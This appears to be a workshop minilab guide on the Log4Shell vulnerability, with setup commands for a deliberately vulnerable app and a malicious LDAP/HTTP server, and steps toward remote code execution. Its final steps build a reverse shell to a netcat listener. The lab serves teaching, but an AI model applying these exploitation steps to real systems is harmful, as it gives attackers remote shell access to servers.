The Log4J incident from December 2021 was one of the biggest and most impactful security issues in recent Java history.
In this minilab, we will look into the vulnerability and try to create our own server.
git clone https://github.com/bmvermeer/log4j-minilab.git
The repository contains an application and a template for a malicious log4shell server.
cd log4japp
./mvnw compile spring-boot:run
cd log4shell-server
./mvnw compile exec:java
The application contains a vulnerable Log4j version. It evaluates JNDI commands and you can connect to an LDAP server that you own to create arbitrary code execution. The log4shell-server already contains an incomplete LDAP server based on the marschalsec project by Moritz Bechler. This server gives a reference to Evil.class which is served to you using an HTTP server. Both the LDAP server and the HTTP are fully functional.
- Startup the log4japp
- go to http://localhost:8080/
- try to login with an incorrect username and password.
- See in the console what is logged
- Check if we use a log4j version that is vulnerable (<2.15)
- Hint1
- Startup the log4shell-server and try to connect to to the server
- If the console gives you a
javax.naming.NamingExceptionwithRoot exception is java.lang.ClassCastException, than you are on the correct spot.
Implement class Evil so it will print “HACKED AT DEVOXXUK” when we load it using the LDAP string from before.
For instance open the calculator on your machine.
- Install netcat on your machine
- Open netcat and listen to port 9001 (in a new shell window)
- Edit your Evil class so it opens a connection to your (local) host on port 9001
- If everything works out, netcat is now connected to your machine and you have shell access. Imagine doing this on a remote machine :)